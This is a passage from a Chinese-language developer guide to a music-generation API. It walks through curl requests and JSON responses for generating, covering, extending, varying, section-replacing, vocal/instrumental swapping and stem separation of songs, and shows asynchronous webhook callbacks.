想些什么歌曲，可以任意输入一段文字，比如我想生成一个关于圣诞的歌曲，就可以输入 a song for Christmas，如图所示：

可以看到这里我们设置了 Request Headers，包括：

accept：想要接收怎样格式的响应结果，这里填写为 application/json，即 JSON 格式。
authorization：调用 API 的密钥，申请之后可以直接下拉选择。

另外 Request Body 的参数包括：

action：此次音乐生成任务的行为，生成歌曲是 generate。
model：创建歌曲采用的模型，目前主要有： FUZZ-2.0 Pro、FUZZ-2.0、FUZZ-2.0 Raw,FUZZ-1.1 Pro、FUZZ-1.0 Pro、FUZZ-1.0、FUZZ-1.1、FUZZ-0.8。
lyric：歌曲的歌词内容。
custom：是否采用自定义方式生成歌曲。
prompt：灵感模式下的提示词。
title：歌曲标题信息。
audio_id：参考歌曲 ID，用于续写/翻版等操作。
continue_at：从指定秒数开始续写歌曲。
replace_section_start/replace_section_end：替换片段的起止时间，单位秒。
lyrics_strength：歌词强度，表示歌词在音频生成中的影响程度，可选0-1之间，默认0.7。
sound_strength：音频提示词强度，可选0.2-1之间，默认0.7。
cover_strength：翻唱强度 0.2-1之间，默认1。
weirdness：风格奇特度，可选 0-1之间，默认0.5
callback_url：需要回调结果的 URL。
instrumental：是否为无歌词模式。

选择之后，可以发现右侧也生成了对应代码，如图所示：

点击「Try」按钮即可进行测试，如上图所示，这里我们就得到了如下结果：

{
  "success": true,
  "task_id": "82fd443a-903a-4f18-8028-12d2f8a0a4be",
  "trace_id": "d85839fa-0bb1-42da-a9fc-cd582c29027d",
  "data": [
    {
      "id": "6c947f13-a3c5-4b9c-8609-5639c37cdc2d",
      "title": "Untitled",
      "image_url": "https://storage.googleapis.com/corpusant-app-public/riffs/a853673e-615c-42ae-bdff-16b1add94861/image/6c947f13-a3c5-4b9c-8609-5639c37cdc2d.jpg",
      "lyric": "[Instrumental]",
      "audio_url": "https://storage.googleapis.com/corpusant-app-public/riffs/a853673e-615c-42ae-bdff-16b1add94861/audio/6c947f13-a3c5-4b9c-8609-5639c37cdc2d.m4a",
      "video_url": null,
      "image_id": "6c947f13-a3c5-4b9c-8609-5639c37cdc2d",
      "topic": null,
      "seed": "2450882164",
      "sound": "A song for Christmas",
      "created_at": "2025-12-30T17:18:23.232911Z",
      "model": "FUZZ-2.0 Pro",
      "progress": "100%",
      "state": "succeeded",
      "duration": "181.3014058956916"
    }
  ]
}

返回结果一共有多个字段，介绍如下：

success，此时音乐生成任务的状态情况。
- data，此次音乐任务的结果
  - id，此时音乐生成任务的 ID。
  - sound，此时音乐生成任务的提示词。
  - seed，此时音乐生成任务的种子值。
  - audio_url，此时音乐生成任务的音频链接。
  - image_url，此时音乐生成任务的封面链接。
  - image_id，此时音乐生成任务的封面ID。
  - state，此时音乐生成任务的状态。
  - duration，此时音乐的时长信息。
  - progress，此时音乐任务的进度值。
  - model，此时音乐生成任务采用的模型信息。
  - lyric，此时音乐生成任务的歌词信息。

可以看到我们得到了想生成的音乐信息，我们只需要根据结果中 data 的音乐链接地址获取生成的 Producer 音乐即可。

另外如果想生成对应的对接代码，可以直接复制生成，例如 CURL 的代码如下：

curl -X POST 'https://api.acedata.cloud/producer/audios' \
-H 'accept: application/json' \
-H 'authorization: Bearer {token}' \
-H 'content-type: application/json' \
-d '{
  "action": "generate",
  "model": "FUZZ-2.0 Pro",
  "prompt": "A song for Christmas"
}'

自定义生成

如果想自定义生成歌词，可以输入歌词：

这时候 lyric 字段可以传入类似如下内容：

[Verse]Woke up with the sun in my eyesNo clouds above just blue in the skiesShoes on my feet I’m ready to runEvery step feels like a loaded gun[Chorus]Happy days are rolling inLet the joy beneath my skinNo more shadows no more liesJust the truth that lifts me high[Verse 2]Dancing through the city streetsA rhythm pounding in my heartbeatStrangers smile it’s catching onThis world’s a stage we’re all a song[Chorus]Happy days are rolling inLet the joy beneath my skinNo more shadows no more liesJust the truth that lifts me high[Bridge]Throw your worries out the doorLet them sink to the ocean floorWe’re alive and it’s enoughLife is messy but it’s love[Chorus]Happy days are rolling inLet the joy beneath my skinNo more shadows no more liesJust the truth that lifts me high

接下来我们要根据歌词、标题、风格自定义生成歌曲，就可以指定如下内容：

lyric：歌词文本
custom：填写为 true，代表自定义生成，该参数默认为 false，代表使用 prompt 生成。
title：歌曲的标题。

填写样例如下：

填写完毕之后自动生成了代码如下：

对应的代码：

curl -X POST 'https://api.acedata.cloud/producer/audios' \
-H 'accept: application/json' \
-H 'authorization: Bearer {token}' \
-H 'content-type: application/json' \
-d '{
  "action": "generate",
  "model": "FUZZ-2.0 Pro",
  "instrumental": false,
  "lyric": "[Verse]\nWoke up with the sun in my eyes\nNo clouds above just blue in the skies\nShoes on my feet I’m ready to run\nEvery step feels like a loaded gun\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Verse 2]\nDancing through the city streets\nA rhythm pounding in my heartbeat\nStrangers smile it’s catching on\nThis world’s a stage we’re all a song\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Bridge]\nThrow your worries out the door\nLet them sink to the ocean floor\nWe’re alive and it’s enough\nLife is messy but it’s love\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high",
  "custom": true
}'

测试允许，生成的效果是类似的。

{
  "success": true,
  "task_id": "9f58bbd4-855a-4233-ac45-b63bf9168e02",
  "trace_id": "145ad117-6ce7-42dd-af12-70751c5284fc",
  "data": [
    {
      "id": "38d3b9e2-0dfb-4338-b2a7-15e45656ed32",
      "title": "Woke up with the sun in my eyes",
      "image_url": "https://storage.googleapis.com/corpusant-app-public/riffs/7ce2b11a-179f-4b87-b5ff-397613c62c93/image/38d3b9e2-0dfb-4338-b2a7-15e45656ed32.jpg",
      "lyric": "[Verse]\nWoke up with the sun in my eyes\nNo clouds above just blue in the skies\nShoes on my feet I’m ready to run\nEvery step feels like a loaded gun\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Verse 2]\nDancing through the city streets\nA rhythm pounding in my heartbeat\nStrangers smile it’s catching on\nThis world’s a stage we’re all a song\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Bridge]\nThrow your worries out the door\nLet them sink to the ocean floor\nWe’re alive and it’s enough\nLife is messy but it’s love\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high",
      "audio_url": "https://storage.googleapis.com/corpusant-app-public/riffs/7ce2b11a-179f-4b87-b5ff-397613c62c93/audio/38d3b9e2-0dfb-4338-b2a7-15e45656ed32.m4a",
      "video_url": null,
      "image_id": "38d3b9e2-0dfb-4338-b2a7-15e45656ed32",
      "topic": null,
      "seed": "3789209121",
      "sound": "",
      "created_at": "2025-12-30T17:26:46.357055Z",
      "model": "FUZZ-2.0 Pro",
      "progress": "100%",
      "state": "succeeded",
      "duration": "153.80897959183673"
    }
  ]
}

翻唱歌曲

如果想对已经生成的歌曲进行翻唱操作的操作，可以输入上文生成的歌曲进行翻唱，接下来我们要根据歌词、标题自定义生成歌曲。

如果想对自己上传的歌曲进行继续翻唱的话，可以将参数 action 设置为 upload_cover ，并且输入需要继续翻唱自定义上传的歌曲 ID，歌曲 ID 的获取是使用 Producer Upload API来获取，如下图所示：

就可以指定如下内容：

action：此次歌曲任务的行为，目前支持：generate、cover、extend、upload_cover、upload_extend、replace_section、swap_vocals、swap_instrumentals、variation，此次翻唱使用cover参数。
lyric：歌词文本
title：歌曲的标题。
custom：是否采用自定义模式生成，默认是false。
audio_id：需要翻唱歌曲的歌曲ID。

填写样例如下：

填写完毕之后自动生成了代码如下：

对应的代码：

curl -X POST 'https://api.acedata.cloud/producer/audios' \
-H 'accept: application/json' \
-H 'authorization: Bearer {token}' \
-H 'content-type: application/json' \
-d '{
  "action": "cover",
  "model": "FUZZ-2.0 Pro",
  "lyric": "[Verse]\nWoke up with the sun in my eyes\nNo clouds above just blue in the skies\nShoes on my feet I’m ready to run\nEvery step feels like a loaded gun\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Verse 2]\nDancing through the city streets\nA rhythm pounding in my heartbeat\nStrangers smile it’s catching on\nThis world’s a stage we’re all a song\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Bridge]\nThrow your worries out the door\nLet them sink to the ocean floor\nWe’re alive and it’s enough\nLife is messy but it’s love\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high",
  "audio_id": "38d3b9e2-0dfb-4338-b2a7-15e45656ed32",
  "instrumental": false,
  "custom": true,
  "title": "Cover"
}'

测试允许，生成的效果是类似的。

{
  "success": true,
  "task_id": "dbca350e-6fb9-46ca-9c7e-4c1a9080806f",
  "trace_id": "a39e0fff-ced8-4b31-ae23-aef3badd90fa",
  "data": [
    {
      "id": "e52dd729-38b4-4c2f-9031-59eb7953c593",
      "title": "Cover",
      "image_url": "https://storage.googleapis.com/corpusant-app-public/riffs/7ce2b11a-179f-4b87-b5ff-397613c62c93/image/e52dd729-38b4-4c2f-9031-59eb7953c593.jpg",
      "lyric": "[Verse]\nWoke up with the sun in my eyes\nNo clouds above just blue in the skies\nShoes on my feet I’m ready to run\nEvery step feels like a loaded gun\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Verse 2]\nDancing through the city streets\nA rhythm pounding in my heartbeat\nStrangers smile it’s catching on\nThis world’s a stage we’re all a song\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Bridge]\nThrow your worries out the door\nLet them sink to the ocean floor\nWe’re alive and it’s enough\nLife is messy but it’s love\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high",
      "audio_url": "https://storage.googleapis.com/corpusant-app-public/riffs/7ce2b11a-179f-4b87-b5ff-397613c62c93/audio/e52dd729-38b4-4c2f-9031-59eb7953c593.m4a",
      "video_url": null,
      "image_id": "e52dd729-38b4-4c2f-9031-59eb7953c593",
      "topic": null,
      "seed": "358803418",
      "sound": "",
      "created_at": "2025-12-30T17:32:32.951948Z",
      "model": "FUZZ-2.0 Pro",
      "progress": "100%",
      "state": "succeeded",
      "duration": "153.0659410430839"
    }
  ]
}

续写歌曲

如果想续写歌曲的话，我们需要传入action参数值为：extend，接下来我们要根据歌词、标题、风格自定义生成歌曲。

如果想对自己上传的歌曲进行继续续写的话，可以将参数 action 设置为 upload_extend ，并且输入需要继续续写自定义上传的歌曲 ID，歌曲 ID 的获取是使用 Producer Upload API来获取，如下图所示：

填写样例如下：

填写完毕之后自动生成了代码如下：

对应的代码：

curl -X POST 'https://api.acedata.cloud/producer/audios' \
-H 'accept: application/json' \
-H 'authorization: Bearer {token}' \
-H 'content-type: application/json' \
-d '{
  "action": "extend",
  "model": "FUZZ-2.0 Pro",
  "instrumental": false,
  "lyric": "[Verse]\nWoke up with the sun in my eyes\nNo clouds above just blue in the skies\nShoes on my feet I’m ready to run\nEvery step feels like a loaded gun\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Verse 2]\nDancing through the city streets\nA rhythm pounding in my heartbeat\nStrangers smile it’s catching on\nThis world’s a stage we’re all a song\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Bridge]\nThrow your worries out the door\nLet them sink to the ocean floor\nWe’re alive and it’s enough\nLife is messy but it’s love\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high",
  "continue_at": 3,
  "audio_id": "38d3b9e2-0dfb-4338-b2a7-15e45656ed32",
  "custom": true,
  "title": "Extend",
  "weirdness": 0.3,
  "sound_strength": 0.3,
  "lyrics_strength": 0.6
}'

测试允许，生成的效果是类似的。

{
  "success": true,
  "task_id": "834983cb-d62d-4750-b1aa-461da137e51f",
  "trace_id": "6923eee2-7403-432c-8bd1-e471086385b0",
  "data": [
    {
      "id": "d9ebc609-fb65-4a23-b914-c074747af6a4",
      "title": "Extend",
      "image_url": "https://storage.googleapis.com/corpusant-app-public/riffs/7ce2b11a-179f-4b87-b5ff-397613c62c93/image/d9ebc609-fb65-4a23-b914-c074747af6a4.jpg",
      "lyric": "[Verse]\n[Verse]\nWoke up with the sun in my eyes\nNo clouds above just blue in the skies\nShoes on my feet I’m ready to run\nEvery step feels like a loaded gun\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Verse 2]\nDancing through the city streets\nA rhythm pounding in my heartbeat\nStrangers smile it’s catching on\nThis world’s a stage we’re all a song\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Bridge]\nThrow your worries out the door\nLet them sink to the ocean floor\nWe’re alive and it’s enough\nLife is messy but it’s love\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high",
      "audio_url": "https://storage.googleapis.com/corpusant-app-public/riffs/7ce2b11a-179f-4b87-b5ff-397613c62c93/audio/d9ebc609-fb65-4a23-b914-c074747af6a4.m4a",
      "video_url": null,
      "image_id": "d9ebc609-fb65-4a23-b914-c074747af6a4",
      "topic": null,
      "seed": "4294469624",
      "sound": "",
      "created_at": "2025-12-30T17:36:14.520928Z",
      "model": "FUZZ-2.0 Pro",
      "progress": "100%",
      "state": "succeeded",
      "duration": "173.87102040816328"
    }
  ]
}

音乐变换

如果想根据上一首音乐的seed值生成一首类似效果的新音乐的话，我们需要传入action参数值为：variation，接下来就可以自定义生成一首类似效果的新音乐。

填写样例如下：

填写完毕之后自动生成了代码如下：

对应的代码：

curl -X POST 'https://api.acedata.cloud/producer/audios' \
-H 'accept: application/json' \
-H 'authorization: Bearer {token}' \
-H 'content-type: application/json' \
-d '{
  "action": "variation",
  "audio_id": "d9ebc609-fb65-4a23-b914-c074747af6a4",
  "model": "FUZZ-2.0 Pro",
  "instrumental": false,
  "lyric": "[Verse]\nWoke up with the sun in my eyes\nNo clouds above just blue in the skies\nShoes on my feet I’m ready to run\nEvery step feels like a loaded gun\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Verse 2]\nDancing through the city streets\nA rhythm pounding in my heartbeat\nStrangers smile it’s catching on\nThis world’s a stage we’re all a song\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Bridge]\nThrow your worries out the door\nLet them sink to the ocean floor\nWe’re alive and it’s enough\nLife is messy but it’s love\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high",
  "custom": true
}'

测试允许，生成的效果是类似的。

{
    "success": true,
    "task_id": "3a74da6d-a37d-4b5d-b116-821f455bce39",
    "trace_id": "8e28cce0-0400-4bfd-83db-6d27f97422c7",
    "data": [
        {
            "id": "c14ca458-cd5a-4700-83d4-5249e15f2707",
            "title": "Woke up with the sun in my eyes",
            "image_url": "https://storage.googleapis.com/corpusant-app-public/riffs/7ce2b11a-179f-4b87-b5ff-397613c62c93/image/c14ca458-cd5a-4700-83d4-5249e15f2707.jpg",
            "lyric": "[Verse]\nWoke up with the sun in my eyes\nNo clouds above just blue in the skies\nShoes on my feet I’m ready to run\nEvery step feels like a loaded gun\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Verse 2]\nDancing through the city streets\nA rhythm pounding in my heartbeat\nStrangers smile it’s catching on\nThis world’s a stage we’re all a song\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Bridge]\nThrow your worries out the door\nLet them sink to the ocean floor\nWe’re alive and it’s enough\nLife is messy but it’s love\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high",
            "audio_url": "https://storage.googleapis.com/corpusant-app-public/riffs/7ce2b11a-179f-4b87-b5ff-397613c62c93/audio/c14ca458-cd5a-4700-83d4-5249e15f2707.m4a",
            "video_url": null,
            "image_id": "c14ca458-cd5a-4700-83d4-5249e15f2707",
            "topic": null,
            "seed": "2082104582",
            "sound": "",
            "created_at": "2025-12-30T17:48:40.135187Z",
            "model": "FUZZ-2.0",
            "progress": "100%",
            "state": "succeeded",
            "duration": "173.12798185941043"
        }
    ]
}

替换片段

如果想对歌曲进行替换片段的话，我们需要传入action参数值为：replace_section，接下来我们要根据歌词、标题自定义生成歌曲。

如果想对自己上传的歌曲进行继续替换片段的话，可以将参数 action 设置为 upload_replace_section ，并且输入需要继续续写自定义上传的歌曲 ID，歌曲 ID 的获取是使用 Producer Upload API来获取，如下图所示：

填写样例如下：

填写完毕之后自动生成了代码如下：

对应的代码：

curl -X POST 'https://api.acedata.cloud/producer/audios' \
-H 'accept: application/json' \
-H 'authorization: Bearer {token}' \
-H 'content-type: application/json' \
-d '{
  "action": "replace_section",
  "model": "FUZZ-2.0 Pro",
  "instrumental": false,
  "lyric": "[Verse]\\nWoke up with the sun in my eyes\\nNo clouds above just blue in the skies\\nShoes on my feet I’m ready to run\\nEvery step feels like a loaded gun\\n[Chorus]\\nHappy days are rolling in\\nLet the joy beneath my skin\\nNo more shadows no more lies\\nJust the truth that lifts me high\\n[Verse 2]\\nDancing through the city streets\\nA rhythm pounding in my heartbeat\\nStrangers smile it’s catching on\\nThis world’s a stage we’re all a song\\n[Chorus]\\nHappy days are rolling in\\nLet the joy beneath my skin\\nNo more shadows no more lies\\nJust the truth that lifts me high\\n[Bridge]\\nThrow your worries out the door\\nLet them sink to the ocean floor\\nWe’re alive and it’s enough\\nLife is messy but it’s love\\n[Chorus]\\nHappy days are rolling in\\nLet the joy beneath my skin\\nNo more shadows no more lies\\nJust the truth that lifts me high",
  "audio_id": "d9ebc609-fb65-4a23-b914-c074747af6a4",
  "replace_section_start": 3,
  "replace_section_end": 70,
  "custom": true
}'

测试允许，生成的效果是类似的。

{
    "success": true,
    "task_id": "3cb5ae96-01b0-4a37-afb0-e582608af56f",
    "trace_id": "3ebc6f63-5093-4499-bf9b-95c239e0da4f",
    "data": [
        {
            "id": "a54609c6-13e2-4176-be0f-4d7eebc68e1f",
            "title": "Woke up with the sun in my eyes",
            "image_url": "https://storage.googleapis.com/corpusant-app-public/riffs/7ce2b11a-179f-4b87-b5ff-397613c62c93/image/a54609c6-13e2-4176-be0f-4d7eebc68e1f.jpg",
            "lyric": "[Verse]\\nWoke up with the sun in my eyes\\nNo clouds above just blue in the skies\\nShoes on my feet I’m ready to run\\nEvery step feels like a loaded gun\\n[Chorus]\\nHappy days are rolling in\\nLet the joy beneath my skin\\nNo more shadows no more lies\\nJust the truth that lifts me high\\n[Verse 2]\\nDancing through the city streets\\nA rhythm pounding in my heartbeat\\nStrangers smile it’s catching on\\nThis world’s a stage we’re all a song\\n[Chorus]\\nHappy days are rolling in\\nLet the joy beneath my skin\\nNo more shadows no more lies\\nJust the truth that lifts me high\\n[Bridge]\\nThrow your worries out the door\\nLet them sink to the ocean floor\\nWe’re alive and it’s enough\\nLife is messy but it’s love\\n[Chorus]\\nHappy days are rolling in\\nLet the joy beneath my skin\\nNo more shadows no more lies\\nJust the truth that lifts me high",
            "audio_url": "https://storage.googleapis.com/corpusant-app-public/riffs/7ce2b11a-179f-4b87-b5ff-397613c62c93/audio/a54609c6-13e2-4176-be0f-4d7eebc68e1f.m4a",
            "video_url": null,
            "image_id": "a54609c6-13e2-4176-be0f-4d7eebc68e1f",
            "topic": null,
            "seed": "14887454",
            "sound": "",
            "created_at": "2025-12-30T18:01:19.907443Z",
            "model": "FUZZ-2.0 Pro",
            "progress": "100%",
            "state": "succeeded",
            "duration": "174.6140589569161"
        }
    ]
}

伴奏翻版

如果想使用官方的伴奏翻版操作，可以将action参数值设为：swap_instrumentals，接下来我们要根据歌词、标题自定义生成歌曲。

填写样例如下：

填写完毕之后自动生成了代码如下：

对应的代码：

curl -X POST 'https://api.acedata.cloud/producer/audios' \
-H 'accept: application/json' \
-H 'authorization: Bearer {token}' \
-H 'content-type: application/json' \
-d '{
  "action": "swap_instrumentals",
  "model": "FUZZ-2.0 Pro",
  "weirdness": 0.6,
  "prompt": "Happy",
  "audio_id": "d9ebc609-fb65-4a23-b914-c074747af6a4"
}'

测试允许，生成的效果是类似的。

{
  "success": true,
  "task_id": "d17d8376-3a58-451d-a976-404719bac11d",
  "trace_id": "ab596807-910a-4e30-bae2-4647895f7d0b",
  "data": [
    {
      "id": "22d7d75c-9e0a-47a8-b22b-eea55eaa0c4b",
      "title": "Extend (Sound swap)",
      "image_url": "https://storage.googleapis.com/corpusant-app-public/riffs/7ce2b11a-179f-4b87-b5ff-397613c62c93/image/22d7d75c-9e0a-47a8-b22b-eea55eaa0c4b.jpg",
      "lyric": "[Verse]\nWoke up with the sun in my eyes\nNo clouds above just blue in the skies\nShoes on my feet I’m ready to run\nEvery step feels like a loaded gun\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Verse 2]\nDancing through the city streets\nA rhythm pounding in my heartbeat\nStrangers smile it’s catching on\nThis world’s a stage we’re all a song\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Bridge]\nThrow your worries out the door\nLet them sink to the ocean floor\nWe’re alive and it’s enough\nLife is messy but it’s love\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high",
      "audio_url": "https://storage.googleapis.com/corpusant-app-public/riffs/7ce2b11a-179f-4b87-b5ff-397613c62c93/audio/22d7d75c-9e0a-47a8-b22b-eea55eaa0c4b.m4a",
      "video_url": null,
      "image_id": "22d7d75c-9e0a-47a8-b22b-eea55eaa0c4b",
      "topic": null,
      "seed": "2157878068",
      "sound": "Happy",
      "created_at": "2025-12-30T18:09:49.594800Z",
      "model": "FUZZ-2.0 Pro",
      "progress": "100%",
      "state": "succeeded",
      "duration": "172.3849433106576"
    }
  ]
}

人声翻版

如果想使用官方的人声翻版操作，可以将action参数值设为：swap_vocals，接下来我们要根据歌词、标题、风格自定义生成歌曲。

填写样例如下：

填写完毕之后自动生成了代码如下：

对应的代码：

curl -X POST 'https://api.acedata.cloud/producer/audios' \
-H 'accept: application/json' \
-H 'authorization: Bearer {token}' \
-H 'content-type: application/json' \
-d '{
  "action": "swap_vocals",
  "model": "FUZZ-2.0 Pro",
  "instrumental": false,
  "lyric": "[Verse]\nWoke up with the sun in my eyes\nNo clouds above just blue in the skies\nShoes on my feet I’m ready to run\nEvery step feels like a loaded gun\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Verse 2]\nDancing through the city streets\nA rhythm pounding in my heartbeat\nStrangers smile it’s catching on\nThis world’s a stage we’re all a song\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Bridge]\nThrow your worries out the door\nLet them sink to the ocean floor\nWe’re alive and it’s enough\nLife is messy but it’s love\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high",
  "weirdness": 0.6,
  "lyrics_strength": 0.8,
  "audio_id": "d9ebc609-fb65-4a23-b914-c074747af6a4",
  "custom": true
}'

测试允许，生成的效果是类似的。

{
  "success": true,
  "task_id": "a903ac38-f129-4f85-9181-b1dc5579bd32",
  "trace_id": "9953af52-45e0-4808-bf13-88f0b21262c1",
  "data": [
    {
      "id": "7b2d653b-aaaa-41b0-b737-aee4c4c5693b",
      "title": "Woke up with the sun in my eyes",
      "image_url": "https://storage.googleapis.com/corpusant-app-public/riffs/7ce2b11a-179f-4b87-b5ff-397613c62c93/image/7b2d653b-aaaa-41b0-b737-aee4c4c5693b.jpg",
      "lyric": "[Verse]\nWoke up with the sun in my eyes\nNo clouds above just blue in the skies\nShoes on my feet I’m ready to run\nEvery step feels like a loaded gun\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Verse 2]\nDancing through the city streets\nA rhythm pounding in my heartbeat\nStrangers smile it’s catching on\nThis world’s a stage we’re all a song\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Bridge]\nThrow your worries out the door\nLet them sink to the ocean floor\nWe’re alive and it’s enough\nLife is messy but it’s love\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high",
      "audio_url": "https://storage.googleapis.com/corpusant-app-public/riffs/7ce2b11a-179f-4b87-b5ff-397613c62c93/audio/7b2d653b-aaaa-41b0-b737-aee4c4c5693b.m4a",
      "video_url": null,
      "image_id": "7b2d653b-aaaa-41b0-b737-aee4c4c5693b",
      "topic": null,
      "seed": "2484735707",
      "sound": "",
      "created_at": "2025-12-30T18:13:01.349875Z",
      "model": "FUZZ-2.0 Pro",
      "progress": "100%",
      "state": "succeeded",
      "duration": "173.12798185941043"
    }
  ]
}

词曲分离

如果想使用官方的词曲分离操作，可以将action参数值设为：stems，接下来我们要根据歌曲ID进行词曲分离。

填写样例如下：

填写完毕之后自动生成了代码如下：

对应的代码：

curl -X POST 'https://api.acedata.cloud/producer/audios' \
-H 'accept: application/json' \
-H 'authorization: Bearer {token}' \
-H 'content-type: application/json' \
-d '{
  "action": "stems",
  "audio_id": "a54609c6-13e2-4176-be0f-4d7eebc68e1f"
}'

测试允许，生成的效果是类似的。

{
    "success": true,
    "task_id": "561ac695-b4aa-47cf-978d-fb7be2b9ebfc",
    "trace_id": "66d0d397-2987-4bde-84fb-a60d0023b217",
    "data": [
        {
            "title": "Woke up with the sun in my eyes",
            "lyric": "",
            "stems_url": "https://platform.cdn.acedata.cloud/producer/561ac695-b4aa-47cf-978d-fb7be2b9ebfc.zip",
            "model": "",
            "progress": "100%",
            "state": "succeeded"
        }
    ]
}

异步回调

由于 Producer Audios Generation API 生成的时间有时候会相对较长，如果 API 长时间无响应，HTTP 请求会一直保持连接，导致额外的系统资源消耗，所以本 API 也提供了异步回调的支持。

整体流程是：客户端发起请求的时候，额外指定一个 callback_url 字段，客户端发起 API 请求之后，API 会立马返回一个结果，包含一个 task_id 的字段信息，代表当前的任务 ID。当任务完成之后，生成任务的结果会通过 POST JSON 的形式发送到客户端指定的 callback_url，其中也包括了 task_id 字段，这样任务结果就可以通过 ID 关联起来了。

下面我们通过示例来了解下具体怎样操作。

首先，Webhook 回调是一个可以接收 HTTP 请求的服务，开发者应该替换为自己搭建的 HTTP 服务器的 URL。此处为了方便演示，使用一个公开的 Webhook 样例网站 https://webhook.site/，打开该网站即可得到一个 Webhook URL，如图所示：

将此 URL 复制下来，就可以作为 Webhook 来使用，此处的样例为 https://webhook.site/#!/view/0d73431d-f833-4be4-9276-b6e1690d55c1。

接下来，我们可以设置字段 callback_url 为上述 Webhook URL，同时填入相应的参数，具体的内容如图所示：

点击运行，可以发现会立即得到一个结果，如下：

1
2
3

{
  "task_id": "1a6ac2ad-10f2-4e2b-b500-66ec27fe82ad"
}

稍等片刻，我们可以在 https://webhook.site/#!/view/0d73431d-f833-4be4-9276-b6e1690d55c1 上观察到生成任务的结果，如图所示：

内容如下：

{
    "success": true,
    "task_id": "1a6ac2ad-10f2-4e2b-b500-66ec27fe82ad",
    "trace_id": "1da03537-4eb8-410d-b849-43f03085a3bb",
    "data": [
        {
            "id": "1dd08826-478e-43a6-868f-aff5ababac2c",
            "title": "Woke up with the sun in my eyes",
            "image_url": "https://storage.googleapis.com/corpusant-app-public/riffs/3bff6223-fe13-4bef-973e-2cbaef430d5d/image/1dd08826-478e-43a6-868f-aff5ababac2c.jpg",
            "lyric": "[Verse]\nWoke up with the sun in my eyes\nNo clouds above just blue in the skies\nShoes on my feet I’m ready to run\nEvery step feels like a loaded gun\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Verse 2]\nDancing through the city streets\nA rhythm pounding in my heartbeat\nStrangers smile it’s catching on\nThis world’s a stage we’re all a song\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high\n[Bridge]\nThrow your worries out the door\nLet them sink to the ocean floor\nWe’re alive and it’s enough\nLife is messy but it’s love\n[Chorus]\nHappy days are rolling in\nLet the joy beneath my skin\nNo more shadows no more lies\nJust the truth that lifts me high",
            "audio_url": "https://storage.googleapis.com/corpusant-app-public/riffs/3bff6223-fe13-4bef-973e-2cbaef430d5d/audio/1dd08826-478e-43a6-868f-aff5ababac2c.m4a",
            "video_url": null,
            "image_id": "1dd08826-478e-43a6-868f-aff5ababac2c",
            "topic": null,
            "seed": "1490770667",
            "sound": "",
            "created_at": "2025-12-30T18:36:00.994141Z",
            "model": "FUZZ-2.0 Pro",
            "progress": "100%",
            "state": "succeeded",
            "duration": "135.2330158730159"
        }
    ]
}

可以看到结果中有一个 task_id 字段，其他的字段都和上文类似，通过该字段即可实现任务的关联。

错误处理

在调用 API 时，如果遇到错误，API 会返回相应的错误代码和信息。例如：

